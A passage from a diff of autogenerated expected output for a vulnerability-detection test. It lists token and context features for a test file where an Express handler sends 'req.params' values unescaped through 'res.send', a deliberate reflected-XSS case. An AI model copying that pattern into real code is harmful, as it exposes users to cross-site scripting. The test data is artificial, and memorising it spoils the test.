| +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | { p, q: ... .params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:7:6:30 | { p, q: ... .params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:9:6:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:12 | q | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:12 | q | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:12 | q | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:12 | q | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:12 | q | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:15 | q: r | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:15 | q: r | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:15 | q: r | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:15 | q: r | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:15 | q: r | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:15 | q: r | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:15 | q: r | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:15 | q: r | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:15 | q: r | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:12:6:15 | q: r | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:15:6:15 | r | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:15:6:15 | r | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:6:15:6:15 | r | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:15:6:15 | r | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:15:6:15 | r | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:21:6:23 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:21:6:23 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:6:21:6:23 | req | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:21:6:23 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:21:6:23 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:21:6:30 | req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:21:6:30 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:6:21:6:30 | req.params | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:21:6:30 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:21:6:30 | req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:6:25:6:30 | params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:6:25:6:30 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:6:25:6:30 | params | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:6:25:6:30 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:6:25:6:30 | params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:5 | res | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:10 | res.send | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:13 | exceptional return of res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:13 | exceptional return of res.send(p) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:13 | exceptional return of res.send(p) | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:13 | exceptional return of res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:13 | exceptional return of res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:13 | res.send(p) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:13 | res.send(p) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:13 | res.send(p) | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:13 | res.send(p) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:7:3:7:13 | res.send(p) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:7:7:7:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:7:7:7:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:7:7:7:10 | send | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:7:7:7:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:7:7:7:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:7:12:7:12 | p | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:7:12:7:12 | p | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:7:12:7:12 | p | contextFunctionInterfaces | | @@ -21910,6 +145993,31 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:7:12:7:12 | p | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:7:12:7:12 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:7:12:7:12 | p | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:5 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:5 | res | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:5 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:10 | res.send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:10 | res.send | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:10 | res.send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:13 | exceptional return of res.send(r) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:13 | exceptional return of res.send(r) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:13 | exceptional return of res.send(r) | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:13 | exceptional return of res.send(r) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:13 | exceptional return of res.send(r) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:13 | res.send(r) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:13 | res.send(r) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:13 | res.send(r) | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:13 | res.send(r) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:8:3:8:13 | res.send(r) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:8:7:8:10 | send | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:8:7:8:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:8:7:8:10 | send | enclosingFunctionBody | req res p q r req params res send p res send r | +| autogenerated/Xss/ReflectedXss/tst2.js:8:7:8:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:8:7:8:10 | send | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:8:12:8:12 | r | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/tst2.js:8:12:8:12 | r | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:8:12:8:12 | r | contextFunctionInterfaces | | @@ -21918,6 +146026,34 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:8:12:8:12 | r | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/tst2.js:8:12:8:12 | r | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:8:12:8:12 | r | receiverName | res | +| autogenerated/Xss/ReflectedXss/tst2.js:11:7:11:17 | aKnownValue | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:11:7:11:17 | aKnownValue | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:11:7:11:17 | aKnownValue | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:11:7:11:17 | aKnownValue | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:11:7:11:25 | aKnownValue | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:11:7:11:25 | aKnownValue | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:11:7:11:25 | aKnownValue | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:11:7:11:25 | aKnownValue = "foo" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:11:7:11:25 | aKnownValue = "foo" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:11:7:11:25 | aKnownValue = "foo" | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:11:21:11:25 | "foo" | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:11:21:11:25 | "foo" | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:11:21:11:25 | "foo" | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:13:3 | app | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:13:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:13:3 | app | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:13:7 | app.get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:13:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:13:7 | app.get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:24:2 | app.get ... / OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:24:2 | app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:24:2 | app.get ... / OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:24:2 | exceptional return of app.get ... / OK\\n}) | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:24:2 | exceptional return of app.get ... / OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:1:24:2 | exceptional return of app.get ... / OK\\n}) | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:5:13:7 | get | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:5:13:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:5:13:7 | get | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:13:9:13:14 | '/bar' | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:13:9:13:14 | '/bar' | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/tst2.js:13:9:13:14 | '/bar' | calleeImports | express | @@ -21925,6 +146061,26 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:13:9:13:14 | '/bar' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/tst2.js:13:9:13:14 | '/bar' | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:13:9:13:14 | '/bar' | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:13:16 | aKnownValue | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:13:16 | aKnownValue | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:13:16 | aKnownValue | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:13:16 | aKnownValue | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:13:16 | aKnownValue | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:13:16 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:13:16 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:13:16 | this | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:13:16 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:13:16 | this | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | 'arguments' object of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | exceptional return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | exceptional return of anonymous function | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | exceptional return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | functio ... // OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | functio ... // OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | functio ... // OK\\n} | calleeImports | express | @@ -21932,6 +146088,121 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | functio ... // OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | functio ... // OK\\n} | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | | autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | functio ... // OK\\n} | receiverName | app | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | return of anonymous function | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | return of anonymous function | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:13:17:24:1 | return of anonymous function | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:26:13:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:26:13:28 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:26:13:28 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:26:13:28 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:13:26:13:28 | req | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:13:26:13:28 | req | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:13:26:13:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:13:26:13:28 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:13:26:13:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:26:13:28 | req | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:31:13:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:31:13:33 | res | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:31:13:33 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:13:31:13:33 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:13:31:13:33 | res | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:13:31:13:33 | res | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:13:31:13:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:13:31:13:33 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:13:31:13:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:13:31:13:33 | res | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:11 | { p } | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:11 | { p } | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:11 | { p } | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:11 | { p } | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:11 | { p } | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:24 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:24 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:24 | p | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:24 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:24 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:24 | { p } = req.params | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:24 | { p } = req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:24 | { p } = req.params | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:24 | { p } = req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:14:7:14:24 | { p } = req.params | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:14:9:14:9 | p | fileImports | clone express fclone json-cycle serialize-javascript sort-keys | +| autogenerated/Xss/ReflectedXss/tst2.js:14:15:14:17 | req | contextFunctionInterfaces | | +| autogenerated/Xss/ReflectedXss/tst2.js:14:15:14:17 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/tst2.js:14:15:14:17 | req | enclosingFunctionBody | req res p req params p aKnownValue res send p res send p p aKnownValue res send p res send p | +| 